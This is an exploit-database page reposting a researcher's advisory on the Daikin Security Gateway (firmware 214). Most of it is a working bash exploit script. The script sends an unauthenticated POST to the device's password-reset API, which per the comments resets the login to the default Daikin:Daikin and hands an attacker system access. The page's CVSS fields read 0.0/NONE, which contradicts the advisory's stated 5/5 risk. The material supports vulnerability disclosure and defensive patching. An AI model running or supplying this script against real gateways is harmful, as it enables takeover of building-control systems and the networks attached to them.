Daikin Security Gateway v214 Remote Password Reset

April 28, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Daikin Security Gateway v214 Remote Password Reset
Exploit ID ZSL-2025-5931
Type zeroscience
Published 2025-04-28T00:00:00
Modified 2025-04-28T00:00:00

CVSS Information

CVSS Score 0.0
Severity NONE
Vector NONE

CVE Information

Exploit Description

Title: Daikin Security Gateway v214 Remote Password Reset Advisory ID: ZSL-2025-5931 Type: Local/Remote Impact: System Access, DoS Risk: (5/5) Release Date: 28.04.2025 Summary The Security gateway allows…

Exploit Code

#!/bin/bash
#
#
# Daikin Security Gateway v214 Remote Password Reset
#
#
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#

[ $# -ne 1 ] && { echo “Usage: $0 “; exit 1; }

TARGET_IP=”$1″
URL=”https://$TARGET_IP/api/settings/password/reset”
PAYLOAD=”t00t”

[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo “Bad IP.”; exit 1; }

RESPONSE=$(curl -kX POST “$URL” -H “Content-type: application/json” -d “$PAYLOAD” 2>/dev/null)

[ $? -ne 0 ] && { echo “Can’t reach $TARGET_IP.”; exit 1; }

if [[ $RESPONSE =~ \”Error\”:0 ]]; then
echo “Reset worked! Vulnerable.”
elif [[ $RESPONSE =~ \”Error\”:1 ]]; then
echo “Not vulnerable.”
else
echo “Got: $RESPONSE”
fi

View Full Exploit Details

πŸ’­ Join the Security Discussion

πŸ”’ Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.